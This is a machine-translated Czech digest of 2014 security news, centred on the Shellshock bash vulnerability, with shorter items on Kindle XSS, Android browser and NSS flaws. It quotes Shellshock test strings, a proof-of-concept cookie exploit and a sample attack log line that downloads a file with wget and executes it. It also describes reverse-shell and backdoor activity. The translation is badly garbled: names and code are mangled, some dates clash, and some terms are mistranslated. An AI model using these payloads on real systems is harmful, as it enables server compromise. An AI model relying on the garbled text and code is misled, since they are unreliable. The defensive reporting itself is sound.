Apple záplaty Shellshock chybu v OS X
9.10.2014 Zranitelnosti
Apple konečně vydala aktualizaci zabezpečení pro OS X, který se zblízka kritické vzdálené spuštění kódu Shellshock chyby nalezené v prostředí GNU Bash UNIX. Tato aktualizace řeší jak CVE-2014-6271 problém objevil Stephane Chazelas, stejně jako ten, CVE-2014-7169 příznakem by Tavis Ormandymu. aktualizací zabezpečení byly pro OS X Mavericks , Mountain Lion a Lion uživatelů. Podle Ars Technica , nebude za předpokladu, že patch pro aktuální OS X Yosemite vývojář nebo veřejné beta staví, ale bude postavena do příštích ty. Pokud jste ve spěchu opravit váš systém, budete muset stáhnout aktualizaci a implementovat ručně, protože ještě nebyly zpřístupněny realizovat prostřednictvím procesu aktualizace obvykle Software (to bude pravděpodobně brzy změní). Jakmile je aktualizace byla provedena, si můžete být jisti, že byl úspěšný po otevření Terminal aplikace a spusťte následující příkaz: bash -version . vrácené informace by měly být GNU bash, verze 03.2.53 (1) -release (x86_64-apple-darwin13), pokud spustíte OS X Mavericks. Číslo v posledním řetězci by mělo být darwin12 nebo darwin11 , v závislosti na tom, zda spuštění Mountain Lion či Lion. Zatímco společnost pracuje na aktualizaci, mluvčí zdůraznil , že drtivá většina uživatelů OS X nejsou ohroženy. "S OS X systémy jsou bezpečné standardně a není vystaveno vzdálených využije bash, pokud uživatelé konfigurovat služby pokročilý UNIX," bylo uvedeno. Intego Derek Erwin napsal užitečné vysvětlení těchto dvou případech, v nichž Mac systémy uživatelů jsou ohroženy využití vady - "obou případech okraj", poznamenává, že "pravděpodobně vyžadovat úroveň odborných znalostí, které člověk konfigurace svůj účet jako takové náplasti využít poměrně jednoduše." Poznamenal také, že viděli proof-of- Koncept využívá na Mac OS X, a vysvětlil, jaké škody útočníci mohli dělat na zranitelném systému.


Wordpress databáze zranitelnost
8.10.2014 Zranitelnosti
Již v roce 2012, jsou jemné lidé stojící za konferenci BruCON oznámila, že od vydání své populární akce 2013, zvláštní rozpočet bude přiděleno na podporu tvůrčí myšlení přijít s projekty, které budou mít prospěch INFOSEC komunitu. Projekt byl pojmenován 5by5 a ve svém prvním roce byly čtyři nápady financovány 5000 EUR.

V letošním roce Ryan Dewhurst a tým za populární WPScan open source černé skříňky WordPress zranitelnosti použít finanční prostředky z 5by5 projektu k nastavení databáze WPScan zranitelnosti , on-line verze WPScan datových souborů slouží k detekci WordPress Core plugin a téma zranitelnosti. Každý položka zranitelnost v databázi specifikuje dotčené verzí, poskytuje externí reference s více podrobností o chybě v otázce, stejně jako poskytuje klasifikaci zranitelnosti (in-house WPVDB ID, CVE, CWE a OWASP Top 10 referenční). Databáze má také API je k dispozici pro nekomerční použití. Myšlenkou projektu je využít stávající depozitář Wordpress bezpečnostních chyb postavený v WPScan a aby tyto otázky více viditelné a přístupné pro WordPress správců, uživatelů a celkovou bezpečnostní komunity. autora : Berislav Kucan, provozní ředitel Help Net Security.


CSAM: Patch a dostat pw0ned (ne OR).
7.10.2014 Zranitelnosti
"Patch tak rychle, jak je to možné" Zdá se, že ještě další společné bezpečnostní praxe vedoucí k síti zkázu. Zazděny stroje nemůže být hacknutý snadno, takže to může trochu pomoci s "bezpečností". Ale na druhou stranu, jak insecuredo chcete, aby vaše zařízení, aby se za účelem podpory nejnovější a nejlepší záplatování nástroje.

Pěkný příběh z Lyalc:

" Před několika lety, zranitelnost skenování výrobní prostředí poprvé nachází asi polovina kritických produkčních serverů v tomto platebním prostředí se funkce Ochrana souborů systému Windows zakázat prostřednictvím klíče registru. "

Ok. To by mi sehnal trochu zjizvenou taky. Ochrana souborů systému Windows (WFP) je skvělá vlastnost, aby ty Win2k a 2K3 systémy trochu bezpečnější, a ujistěte se, hacking je dost těžké, že některé skript kiddies nemusí obtěžovat. Líbí se mi to, a nechtěl, aby to, že máte vypnutý vše náhle.

"Netřeba dodávat, že procesy reakce na incidenty kopl velmi rychle.? Během počáteční analýzy, bylo zjištěno, že dotčené servery měli? Náplastí na kritickou platební komponenty, několik týdnů před skenování zranitelnosti.? Tento software, z globální prodejce platebních prostředků, je používán velkou část odvětví platebního styku, což je přirozený cíl pro malware a rootkit dodavatelé. "

Ok. To by mě taky nadšený (a vzrušení nikdy nebyly dobré v oblasti bezpečnosti. Mám rád své bezpečnostní operace být nudné, ...). Platební systémy, myslím, že jsem slyšel o pár případech, kdy napadl. Ano, zdá se, že oprava. Ale co náplast? Jak dlouho byli zranitelní před použitím náplasti? A dobře, obrana do hloubky je určena pro lidi, kteří nemohou dělat incidenty odpověď jako Lyalc coninues?:

... Místo neměl nainstalován FIM, ani se skenování zranitelnosti byly provedeny dříve. [FIM: Forefront Identity Manager]

Tak co se stalo? Jak se to může možná být falešně pozitivní?

Po této linie vyšetřování zjistili, že opravný balíček Instalační bylo zakázání WFP, ale zanedbávají znovu povolit funkci, takže servery náchylné na změny systémových souborů.

Ah! Plátek.?

Jen slovo o záplaty, v týdnu, kdy jsme se zrovna udělal s dobrou řadu vysoce kritických nouzových záplat pro Shellshock: přestat obávat o rychlosti sám. Ztratíte. Přemýšlejte o tom, Shellshock a heartbleed: Nemůžeš opravit podnik dostatečně rychle. Co budete potřebovat místo, je:

dobře promyšlené záplatování proces. Jak jsme na záplatování, jak jsme se vyhnout stanoví systém, jak zajistit, aby se náplast dostal skutečně použity?
komplexní inventarizace. Nelze zajistit (nebo náplast), co nemáte
Pevné ovládací prvky pro detekci útoků a využívány systémy. Musíte viditelnost sítě, aby bylo možné detekovat útoky a co je důležitější, využívaných systémů.


Shellshock: Více informací o uvolněné CVE-2014-6277 a CVE-2014-6278. Také: Má Windows mají problém Shellshock?
6.10.2014 Zranitelnosti
Michal Zalewski se zveřejňovat více podrobností o dvě zranitelnosti objevil v důsledku Shellshock. Použil fuzzer objevit jak zranitelná místa, a nyní zveřejnila PoC využívá pro obě strany. [1]

Chcete-li zjistit, zda jste zranitelní, Michal body tohoto testu řetězec:

foo = '() {echo not patched; } 'Bash-c foo

Rychlý test ukazuje, up-to datum OS X, CentOS a Ubuntu jako nejsou ohroženy.

První z nich, CVE-2014-6277, je více "tradiční" použití neinicializované paměti. Ve většině případů, bude to jen způsobí havárii. Nicméně, to může být také využit k dosažení spuštění libovolného kódu. Ve své podstatě je to opět způsobeno tím, jak jsou funkce analyzován v proměnných prostředí, takže by to bylo využitelné přes HTTP požadavků.

Druhý, CVE-2014-6278, je blíže k původnímu Shellshock chyby. PoC exploit napsal Michal je:

HTTP_COOKIE = '() {_; }> _ [$ ($ ())] {Echo ahoj mami; id;} 'bash-c:

Stejně jako první chyba, parser je zmatená o tom, kde definice funkce skončí, a provede kód v {}.

Koncem minulého týdne, blog post o podobnou chybu v systému Windows navrhl některé, které prostředí Windows je zranitelný stejně [2]. Tato chyba zabezpečení je však poněkud odlišná. Není předán jiné skořápky plodil od původní. Také v systému Windows, je ještě méně pravděpodobné než v Unixu mít cgi-bin skripty volat přímo shell. Jedinou realistickou využít vektor ve Windows i nadále prostředí, jako je cygwin, které instalují bash v systému Windows.

[1] http://lcamtuf.blogspot.com/2014/10/bash-bug-jak-jsme-nakonec-cracked.html
[2] http://thesecurityfactory.be/command vstřikování-windows.html


Bash "Shellshock" chyba: Kdo potřebuje na starosti?
4.10.2014 Zranitelnosti
Jak se dalo očekávat, útočníci začali využívání GNU Bash "Shellshock" vzdálené spuštění kódu chyba (CVE-2014-6271), ke kompromisu systémy a infikovat je s malware. Po zveřejnění své existence, Alien Vault začala běží nový modul v jejich lákadla a čeká na útočníky, jejichž cílem je tuto chybu zabezpečení zneužít. "Měli jsme několik hitů v posledních 24 hodinách. Většina z nich jsou systémy se snaží zjistit, zda je systém zranitelný a jednoduše odeslat příkaz ping zpět ke stroji útočníka," sdílené výzkumník Jaime Blasco. "Kromě těchto hitů jsme našli na útočníky, kteří používají tuto chybu zabezpečení zneužít instalovat dva různé kusy malware na oběti." V první řadě, užitečné zatížení je ve formě ELF binárních, které otisky prstů infikované systémy, otevře backdoor do systému, a může systém účasti na DoS útoků a útoků hrubou silou. Zscaler a Kaspersky Lab mají více informací o tomto útoku, který jak se zdá, zaměřit Nginx a Apache webové servery nakonfigurovány pro použití mod_cgi . Ve druhém případě , užitečné zatížení je repurposed IRC bot, který se připojí k IRC serveru a čeká na příkazy. Mezitím, Google výzkumník Travis Ormandymu našel druhý způsob (CVE-2014 až 7169) pro zneužití této chyby, jako náplast pro upevnění CVE- 2014-6271 byla neúplná a může ještě dovolit některé znaky, které mají být vstříknut do cílového prostředí. To je chyba, která webový server administrátoři obávat nejvíce, a to zejména v případě jejich servery běží Bash z cgi-bin , poznamenal SANS ISC CTO Johannes Ullrich. On také poskytoval rady o tom, jak správci mohou chránit své servery (také zde ). "Webové servery nejsou jedinou aplikací v ohrožení," varuje Trend Micro. "SSH mohou být také citlivé na Shellshock. V tomto okamžiku libovolný server, Unix / Linux OS, který používá Bash jsou v nebezpečí. Ve výchozím nastavení je většina z nich použít Bash, s některými výjimkami. Například FreeBSD výchozí shell tcsh." Pravidelné uživatelé mohou povzdech úlevou, protože není mnoho koncových zařízení jsou zranitelní. "Aktuální údaje ukazují, že asi 10% uživatelů PC používat nějakou formu Linux nebo Max OS X. Tyto operační systémy mohou být náchylné k Shellshock, i když i zde těžba je mnohem obtížnější , "oni poznamenal . "Pro koncové uživatele, může největší obavy dobře být využije přes nepoctiví DHCP servery běží na potenciálně zasažených routery a aktivní Bash je používán klienty DHCP k nastavení systému,. klient připojení k nepoctivým serveru DHCP může skončit běhat škodlivé příkazy na jejich systém. To lze velmi snadno provést pomocí škodlivých otevřených Wi-Fi sítí. Doporučujeme uživatelům, aby se zvlášť opatrní, z nichž WiFi sítí pro připojení, ale to je již součástí nejlepších dlouhodobých postupů. " Android zařízení a iOS zařízení (není-li jailbroken) nejsou ovlivněny chyby. "Kořeny a upraven zařízení, která nyní běží na * NIX varianty (a, jako výsledek, Bash) může být ovlivněna," poukázali. Apple má zatím k vydání opravu pro OS X, ale podle na Apple mluvčí, drtivá většina uživatelů OS X nejsou ohroženy. "S OS X systémy jsou bezpečné standardně a není vystaveno vzdálených využije bash, pokud uživatelé konfigurovat služby pokročilé UNIX. Pracujeme rychle poskytnout aktualizaci softwaru pro naše pokročilé uživatele systému UNIX." Konečně, někteří Internet věcí zařízení postavené na vložené verze Linuxu jsou zranitelné, a chyba může být zneužita k lano je do botnetu. Bohužel, záplatování některých z těchto zařízení je problematické, jak se někteří z prodejců jsou velmi laxní, pokud jde o vytváření a vydávání aktualizací zabezpečení. "Tato chyba bude mít vliv nepoznatelný řadu výrobků a systémů, ale za podmínek, které využít to je docela neobvyklé pro vzdálené využití, " uklidnil . Rapid7 je Jen Ellis, a vyjádřil názor, že riziko rozsáhlých útoků ve volné přírodě je menší než Hearbleed Flavio De Cristofaro, VP of Engineering profesionálním výrobkům, společnosti Core Security, souhlasí: "Od můj pohled, Heartbleed byl trochu více znepokojující vzhledem k postižených částí a masivní použití SSL. Bash je k dispozici na většině * nix systémů, a mající Bash otočí hostitele zranitelné, ale ne nutně vzdáleně zneužitelné. jsou nutné další podmínky, aby . dovolit vzdáleně ohrozit bezpečnost hostitele podstatě musíte být schopni aplikovat příkazy do flámu ". "Uživatelé musí opravit Někteří lidé se doporučuje, aby uživatel zkontrolovat, zda jsou nebo nejsou běží CGI -., ale to je naprosto nestačí. C ++, Python, PHP a všechny ostatní aplikace, která umožňuje bash hovory jsou ovlivněny. Ostatní aplikace podporující protokol DHCP, SSH (restriucted shell), mohou být rovněž ovlivněny, a to nejen ze vzdáleného útoku, ale také z místní eskalaci práv pohledu. Takže náplasti, náplasti, náplasti, "radí. "Opravy jsou již k dispozici pro většinu známých systémů, nebo budou k dispozici velmi brzy. Někteří dodavatelé publikoval brzy opravu, která byla neúplná, a oni měli zveřejnit novou opravu dnes. Ponecháme-li stranou * nix distribuce, budou společnosti potýká se značnými problémy, pokud potřebujete opravit staré systémy nebo systémy založené na embedded zařízení, jako jsou kamery, routerů a ICS, pokud jsou spuštěny Bash. Naštěstí, že by neměla být příliš časté, protože Bash je obvykle příliš těžká pro systémy, jako je, že. "


Kritická chyba SSL oprava v Firefox, Thunderbird, Chrome
3.10.2014 Zranitelnosti
Jste-li uživatelem Mozilla Firefox, Thunderbird nebo SeaMonkey, byste měli implementovat nejnovější záplaty vydané společností co nejdříve, protože opravit kritickou chybu, jejíž využití může vést k úspěšnému útoku Man-in-the-middle. chyba postihuje všechny verze knihovny Mozilla NSS, a dělá to náchylné k variantě podpisu padělání útoku dříve vydané Daniel Bleichenbacher, Mozilla vysvětlila . "To je způsobeno mírným parsování ASN.1 hodnot zapojených do podpisu a mohla by vést k utváření RSA certifikáty." Závažnost vady svědčí i fakt, že US-CERT vydal výstrahu o tom, ve kterém oni také varoval, že zranitelné Mozilla NSS knihovna je často zahrnuta do třetího-party software, včetně Linuxových distribucí, Google Chrome, Google OS a další. Společnost Google vydala aktualizaci zabezpečení, která opravuje chybu, pro její Chrome stabilní kanál, takže uživatelé Chrome měli aktualizovat stejně. Doufejme, že záplaty pro ostatní software obsahující tuto chybu brzy následovat. Další technické informace o vadu lze nalézt zde . chyba byla hlášena jak Antoine Delignat-Lavaud, bezpečnostní výzkumník v INRIA Paříži v týmu Prosecco, a Advanced Threat Research týmu na Intel bezpečnosti.


Kritická chyba Bash otevře UNIX, Linux, OS X na útoky
3.10.2014 Zranitelnosti
Bash "Shellshock" chyba ( CVE-2014-6271 ) byla objevena minulý týden Unix / Linux odborné Stephane Chazelas, a jeho existence byla zveřejněna ve středu. Ovlivňuje Bash , interpret příkazů přítomné na mnoha unixových systémů a systémů založených na IT: různých Linuxových distribucí a Apple OS X. To může být zneužita útočníky, kteří se snaží potlačit nebo omezení bypass prostředí spouštět příkazy shellu, tedy neoprávněný, škodlivý kód. vada je považována za kritickou pro mnoho důvodů. Za prvé, počet postižených zařízení je obrovský: myslíte, že o všech webových serverech (včetně těch, Apache) a embedded zařízení (routery, atd), běží na systému Linux, počítače Mac ... počet může velmi dobře být ve stovkách miliony. Za druhé, US-CERT a NIST dal maximální skóre (10,0), jak pro dopad a využitelnosti. Využití vady může vést k neoprávněnému zveřejnění informací, proti neautorizovanému přístupu do systému a modifikaci, a narušení služby, a postup využití je velmi krátká a jednoduchá:. To trvá jen pár řádků kódu Podle CloudFlare bezpečnostní inženýr Ryan Lackey , chyba je již využíván v přírodě ručně, a je to jen otázkou času, kdy někdo vytvoří červa a automatizuje útok a umožňuje skákat z jedné zranitelné systému do druhého. Nakonec, chyba byla přítomna celá léta, ale to je nemožné říci, zda to byl využit při útocích dřív. Sean Gallagher sdílí snadný způsob, jak zjistit, zda váš systém Linux nebo Unix je zranitelný, a dobrou zprávou je, že mnoho populárních distribucí Linuxu již vydal patch . " GNU Bash oprava je k dispozici i pro zkušené uživatele a správce k provádění, "US-CERT uvedeno v oznámení. Zatímco oprav sám je snadné a může být provedena rychle, že hlavní problém pro správce bude vystopovat všechny zařízení, která jsou zranitelné, a to zejména pokud budou jejich sítě jsou obrovské a složité. "Na rozdíl od Heartbleed, která ovlivnila pouze určitou verzi OpenSSL tento bash chyba byla po dlouhou, dlouhou dobu. To znamená, že existuje spousta starých zařízení v síti zranitelné ve vztahu k této chybě. Řada systémů, které je třeba oprava, ale nebude, je mnohem větší, než Heartbleed, " poznamenal errata zabezpečení na Robertem Grahamem. "Existuje jen málo třeba spěchat a opravit tuto chybu. Vaše primární servery jsou pravděpodobně náchylnější k této chybě. Nicméně, všechno ostatní asi je. Skenování sítě pro věci, jako Telnet, FTP, a starší verze Apache (masscan je velmi užitečné pro toto). Cokoli, co reaguje je pravděpodobně starý přístroj potřebovat bash opravu. A protože většina z nich nemůže být oprava, jste pravděpodobně v háji. " Domácí uživatelé, kteří musí dělat skutek sami se doporučuje pravidelně kontrolovat webové stránky výrobců, jejichž zařízení (například směrovače), které vlastní pro aktualizace zabezpečení k řešení problému, a k provedení těchto aktualizací, jakmile budou moci. To platí i pro uživatele OS X stejně.


Xen Security Advisory - XSA 108 - http://xenbits.xen.org/xsa/advisory-108.html
2.10.2014 Zranitelnosti
Xen vydal poradenství a související opravu k řešení problému, který umožňuje "buggy nebo škodlivý HVM hosta zhroucení hostitele nebo číst data týkající se ostatními hosty nebo hypervisor sám."

Xen 4.1 a novější jsou zranitelné, tak systémy x86 jsou zranitelné. ARM systémy nejsou ohroženy.

Použití náplasti je tento problém vyřešen.


Útočníci zneužívají chybu Shellshock

30.9.2014 Zranitelnosti
Výzkumníci již zaznamenali několik útoků na webové stránky a servery za použití kritické chyby Shellshock.

Zranitelný software používají milióny serverových jednotek, přičemž výzkumníci zatím hovoří o tisícovkách napadených serverů. Má se však za to, že počet útoků poroste s tím, jak se bude internetem šířit škodlivý kód. Útočníci napadené počítače využívají například k vytváření botnetů.

Chyba nazvaná Shellshock byla objevena v shellu Bash, který je široce používán především unixovými operačními systémy a v Linuxu a nachází se i v mnoha jejich variantách. V ohrožení jsou tedy i uživatelé systému Mac OS X od Applu, přestože společnost tvrdí opak a uživatele chce uklidnit uvolněním rychlé opravy.

Podle Jaimeho Blascoa z bezpečnostní firmy AlienVault útočníci používají skenovací programy, pomocí kterých se snaží najít napadnutelné počítače. V případě pozitivního nálezu jim pak nic nebrání v instalaci malwaru.
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

Kontrola, kterou mohou útočníci po ovládnutí počítače získat, činí ze Shellshocku potenciálně větší problém, než jakým byla zranitelnost Heartbleed objevená v dubnu letošního roku. „Heartbleed pouze útočníkům zpřístupnil určité informace, zatímco díky Shellshocku mohou získat kontrolu nad vašimi servery a weby,“ uvedl Kasper Lindegaard z firmy Secunia.

O závažnosti celé situace svědčí i to, že britská vláda zveřejnila prohlášení, ve kterém uvedla, že pro tamní kyberbezpečnostní složky má Shellshock nejvyšší prioritu. Podobný postup se očekává i od amerických a kanadských úřadů. S chybou se nějakým způsobem snaží vypořádat i velké technologické firmy, jako jsou Amazon, Google nebo Akamai.


XSS chyba umožňuje Amazon účtu únos
29.9.2014 Zranitelnosti
Opakující se XSS chyba v Kindle Library Amazon, tedy "Správa vašeho Kindle" webové aplikace, může být zneužita útočníky, kteří se snaží unést Amazon účtu uživatelů, německý výzkumník varoval . Aby tento útok fungoval, musí být uživatel napálil do přidání e-book, který obsahuje konkrétní skript v jeho metadat svého Kindle knihovny a potom otevřete webovou stránku Kindle Library. Až to bude hotové, kód je automaticky spuštěn, a útočník může sklízet Amazon účtu cookies, které pak lze použít k získání přístupu k účtu oběti. Aby jí dokázal svou pravdu, Mussler vytvořil soubor Proof-of-Concept, který obsahuje skript v názvu metadat a dala k dispozici ke stažení, takže ostatní mohou ověřit svá tvrzení. Ale zdá se, že chyba není nic nového. On nejprve objevil v listopadu 2013 a oznámí Amazon to. Tým Information Security společnosti fixní, ale pro zatím neznámého důvodu znovu chybu v nové (nejnovější) verze "řídit svůj Kindle" web app. Mussler varoval Amazon opět o existenci chyby, ale neslyšel zpět od nich za dva měsíce, což ho vedlo k tomu, aby se informace zveřejní. chyba ovlivňuje každého, kdo používá Kindle knihovnu Amazon pro ukládání e-knihy, nebo dodat je do Kindle, ale uživatelé, kteří stahují pirátské e-knihy z třetí strany Zdroje jsou určitě ve větším nebezpečí než těm, nákup knih od Amazonu. Když Mussler zpočátku našel chybu, on byl také testován Calibre e-book aplikace pro správu, které někteří používají jako alternativa k Kindle knihovny Amazon, a zjistil, že je také zranitelná. Naštěstí pro uživatele, Calibre, chyba byla opravena v rekordním čase.


Kritická Android Browser chyba ohrožuje soukromí uživatelů
29.9.2014 Zranitelnosti
Začátkem tohoto měsíce, bezpečnostní výzkumník Rafay Baloch se vydala k proof-of-concept exploit, který využívá zranitelnosti v bezpečnostním mechanismem se systémem Android prohlížeče a může umožnit útočníkovi sklizeň citlivá uživatelská data. "Tím, že malforming si javascript: handler URL s předřazen null byte, útočník může vyhnout stejného původu politiky (SOP), bezpečnostní kontroly prohlížeč Android Open Source platforma (AOSP) Prohlížeče, "Tod Beardsley, Rapid7 inženýr, vysvětlil . "Co to ​​znamená, libovolnou webovou stránku (řekněme, jeden . řízen spammer nebo špion), může nahlédnout do obsahu jakékoliv jiné webové stránky Představte si, že jste šel do útočníků místě, když jste měli svůj webmail otevřený v jiném okně - Útočník by se mohl škrábat vaše e-mailová data a zjistit, co vaši prohlížeč vidí. hůř, mohl by zachytit kopii cookie a unést vaši relaci zcela a číst a psát webmail vaším jménem. " "Zatímco AOSP prohlížeč má" byl zabit off "od společnosti Google, je velmi populární, a to i na moderních zařízeních používaných sofistikované uživatele, kteří preferují legální prohlížeč na Google Chrome, Firefox, Dolphin, nebo jiných prohlížečů, "Beardsley zdůraznil a dodal, také to, že téměř všechny nižší-end předplacených telefonů z hlavních výrobců a dopravci jsou stále dodávány s to nepodporovaný prohlížeč a pre-4.4 staví na Androidu. Tým Rapid7 vydala Metasploit modul pro využití chybu, a podle Baloch, Google potvrdil, že se pracuje na opravy pro Android verze před posledním (v4.4 , tedy KitKat). Jedinou otázkou nyní je, jak přesně se mají na mysli, aby se zasadila tuto opravu. Jak Peter Bright poznamenal , AOSP Browser je obvykle aktualizován pouze aktualizací operačního systému. "Včasná dostupnost Android aktualizací zůstává problematickým bodem pro operační systém, takže i když Google vyvíjí opravu, to může také být k dispozici pro ty, kteří skutečně Potřebuji to, "podotkl. V současné době mohou uživatelé chránit tím, že upustí Android prohlížeč a začít používat alternativní ten, který je určitě nebude založena na stejném kódu: Firefox, Opera a Chrome.


"Bash" (CVE-2014-6271), zranitelnost - Q & A
26.9.2013 Zranitelnosti

Co je to "bash" zranitelnost?

"Bash" zranitelnost, ve skutečnosti popsán jako CVE-2014-6271, je extrémně výkonný zranitelnost vzhledem k jeho vysoké dopadu a snadnost, s níž může být využit. Útočník může jednoduše spouštět příkazy na systémové úrovni, se stejnými oprávněními jako dotčených služeb.

Ve většině příkladů na internetu právě teď, útočníci jsou na dálku útočí na webové servery hosting CGI skripty, které byly napsány v bash nebo předávání hodnot shell skriptů.

V době psaní tohoto článku, chyba již byla použita pro nekalými úmysly - infikuje zranitelné webové servery s malware, a také útoky hackerů. Naši výzkumníci se neustále sbírat nové vzorky a projevy infekce na základě této zranitelnosti; a další informace o tomto malware budou brzy zveřejněna.

Klíčovou věcí pochopit, je to, že chyba není vázán na konkrétní službu, například Apache nebo Nginx. Spíše zranitelnost spočívá v bash shellu tlumočníka a umožňuje útočníkovi přidat příkazy na úrovni systému proměnných prostředí bash.

Jak to funguje?

Budu používat stejné příklady, které jsme viděli v rad a proof-of-concept kód, které byly publikovány, vysvětlit, jak to funguje. Máte-li skript CGI na webovém serveru, tento skript automaticky načte některé proměnné prostředí, jako je například IP adresa, verzi prohlížeče a informace o místním systému.

Ale jen si představte, že byste mohli nejen projít této běžné systémové informace na skript CGI, ale může také říct, skript spouštět příkazy na systémové úrovni. To by znamenalo, že - bez nutnosti jakékoli pověření na serveru - jakmile máte přístup k CGI skript by to čtení proměnné prostředí; a pokud tyto proměnné prostředí obsahovat využívat řetězec, skript by také spustit příkaz, který jste zadali.

Co jej činí jedinečným?

Tato chyba zabezpečení je unikátní, protože je to velmi snadné zneužít a dopad je neuvěřitelně těžké - v neposlední řadě proto, že z částky zranitelných cílů. To není jen vliv na webové servery, ovlivňuje veškerý software, který používá interpret bash a čte data, které můžete ovládat.

Vědci se také snaží zjistit, jestli ostatní tlumočníci, jako je PHP, JSP, Python nebo Perl, jsou také ovlivněny. Ddepending o tom, jak se píše kód, někdy interpret skutečně používá bash vykonávat určité funkce; a pokud je to váš případ, může se stát, že ostatní tlumočníci by mohly být také použity k využití CVE-2014-6271 zranitelnost.

Dopad je neuvěřitelně vysoká, protože existuje mnoho embedded zařízení, které používají CGI skripty - například směrovače, domácích spotřebičů a bezdrátových přístupových bodů. Oni jsou také zranitelní a v mnoha případech obtížné opravit.

Jak rozšířená je to?

To je velmi těžké říct, ale víme, že z našich zpravodajských systémů, které lidé začali rozvíjet využije a červy přímo za informace zranitelnost byla zveřejněna - vědci i whitehat a blackhat skenování Internet pro zranitelné servery.

Je příliš brzy na to vědět, jak rozšířený je to, ale vím, že z mého vlastního výzkumu, že existuje velké množství webových serverů se systémem CGI skripty, a jsem si jistý, že budeme také mnoho dalších typů zneužití vyvíjeny, že zaměřit se na místní soubory a síťové démony. Tam byly diskuse týkající se jak OpenSSH a DHCP klienty, kteří se náchylné k útoku stejně.

Jak mohu zkontrolovat, zda můj systém / web byl ovlivněn?

Nejjednodušší způsob, jak zkontrolovat, zda je váš systém zranitelný je otevřít bash-shell na vašem systému a spusťte následující příkaz:

1
"env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

V případě, že shell vrátí řetězec "zranitelný", měli byste aktualizovat váš systém.

Také tam jsou nástroje pro odborné publikum tam venku, které mohou být použity k ověření, zda váš server je ovlivněn touto chybou.

Poradenství o tom, jak vyřešit tento problém

První věc, kterou musíte udělat, je aktualizovat své bash verze. Různé distribuce Linuxu nabízíme opravy této chyby zabezpečení; a ačkoli ne všechny patche se ukázala být zcela účinná, záplatování je první věc. Služby jako Heroku vytlačila opravy, které budou auto-platí do 24 hodin, ale vývojáři mohou donutit aktualizace taky.

Pokud používáte nějaké IDS / IPS Chtěl bych také doporučujeme přidat / načtení podpisu za to. Mnoho veřejných pravidel byly zveřejněny.

Také zkontrolujte nastavení webserveru. Pokud existují nějaké CGI skripty, které nepoužíváte, zvažte jejich zakázání

Je hrozbou pro on-line bankovnictví?

Tato zranitelnost je aktivně využíván na cílové servery hostované na internetu. Dokonce i některé pracovní stanice se systémem Linux a OSX jsou zranitelné, ale útočník by bylo ještě třeba najít způsob útoku, který bude pracovat na dálku proti vaší pracovní ploše. Proof of concept cílení * nix stanice dhcp klienty byl propuštěn, ale většina politik stanice dhcp procesu zabránit akcím tento druh využití ve výchozím nastavení.

Exploit pokusy, které jsme pozorovali, se zaměřují na serveru zranitelnosti a stahování DDoS roboty pro další DDoS útoky. Je pravděpodobné, že servery hosting PII a manipulaci s citlivými obchodníka údaje jsou napadeni, stejně, ale my jsme ještě pozoroval. Existují obchodníci, které bohužel nemají opravu rychle.

Mohu zjistit, zda někdo zneužil tuto proti mně?

Doporučujeme prohlížení protokolů HTTP a zkontrolujte, zda je něco podezřelé. Příkladem nebezpečného vzoru:

1
192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"

Tam jsou také některé patche pro bash, kteří se přihlašují každý příkaz, který je předán do interpretu bash. To je dobrý způsob, jak zjistit, jestli někdo zneužít váš počítač. To nezabrání někomu zneužití této chyby zabezpečení, ale bude protokolovat akce útočníkům v systému.

Jak vážná je hrozba?

Tato chyba je velmi nebezpečné opravdu, ale ne každý systém je zranitelný. Musí být splněny zvláštní podmínky pro webový server, které mají být využity. Jedním z největších problémů je, že teď, když jsou náplasti zveřejněny budou vědci hledat jiné způsoby, jak využít bash, prozkoumat různé podmínky, které mu umožňují být využit, atd Takže náplast, která pomáhá zabránit vzdálené spuštění kódu, nelze dělat nic proti , například soubor přepsat. Takže tam bude pravděpodobně řada patchů a mezitím systémy jsou stále zranitelné.

Je to nový Heartbleed?

No, je to mnohem jednodušší pro cybercriminal využít než Heartbleed. Také v případě Heartbleed, cybercriminal mohl ukrást pouze data z paměti, doufají, že najdou něco zajímavého. Naproti tomu, bash zranitelnost umožňuje plnou kontrolu nad mnohem možného systému. Takže by se mohlo zdát, že je mnohem nebezpečnější.

Může být použit v budoucích APT útoků?

To by mohly být použity pro budoucí vývoj malware, samozřejmě. Škodlivém by mohly být použity pro automatické testování infrastruktury pro takové chyby, infikovat systému nebo útoku ji jiným způsobem.


Shellshock a jeho inovátoři
26.9.2013 Zranitelnosti

Krátce po zveřejnění Bash chyby názvem " Shellshock "jsme viděli první pokusy zločinců Chcete-li využít této rozšířené zranitelnosti také známý jako CVE-2014-6.271 .

Nejnovější pokusy, které vidíme získat kontrolu nad internetovým serverům stačí vytvořit novou instanci bash a přesměrovat ji na vzdálený server naslouchá na určitém portu TCP. To je také známý jako reverzní-connect-shell. Zde je příklad toho, jak se zdá, že útok na webserver logu:

shellshock_reverse-shell_ortloff

Útočník naslouchá na IP adresu 195.xx.xx.101 na TCP portu 3333 , zatímco původ útoku je IP adresa 94.xx.xx.131 . Chcete-li získat kontrolu nad serverem s touto metodou, žádné externí binární soubory jsou zapojeny.

V dalším probíhajícím útoku zločinci používají speciálně vytvořené HTTP požadavek k využití Bash zranitelnosti k instalaci Linuxu backdoor na serveru oběti. Jsme detekci malware a jeho varianty jako Backdoor.Linux.Gafgyt.

Binární obsahuje dvě napevno IP adresy. První z nich se používá pouze oznámit zločince o nové úspěšné infekce. Druhá IP adresa se používá jako příkaz-a-řídicí server (C & C), komunikovat přímo s malware běžící na infikované webserver.

Následující obrázek ukazuje příklad, jak tato komunikace může vypadat takto:

shellshock_traffic-example_ortloff

V souladu 1 malware odešle zprávu "Ahoj" a říká, že útočník, který architektura byla binární zkompilovaný pro - zde je to x86.

shellshock_hello-message_ida_ortloff

Nezávisle příkazů zaslaných útočníky, backdoor pošle " PING "žádost každých 30 sekund, což je odpověď s" PONG "ze serveru (pro lepší čitelnost Odstranili jsme některé z PING / PONG -pairs z výše uvedeného příkladu ).

Příkazy začínají vždy " ! * ". První příkaz vidíme v tomto případě je " skener na "příkaz v souladu 10. To říká binární skenování náhodné IP rozsahy pro hostitele přijímání telnet na portu TCP 23. Pokud se taková hostitel pokusí přihlásit pomocí napevno seznam společných výchozích kombinací uživatel / hesla.

shellshock_verylitte_dict_ortloff

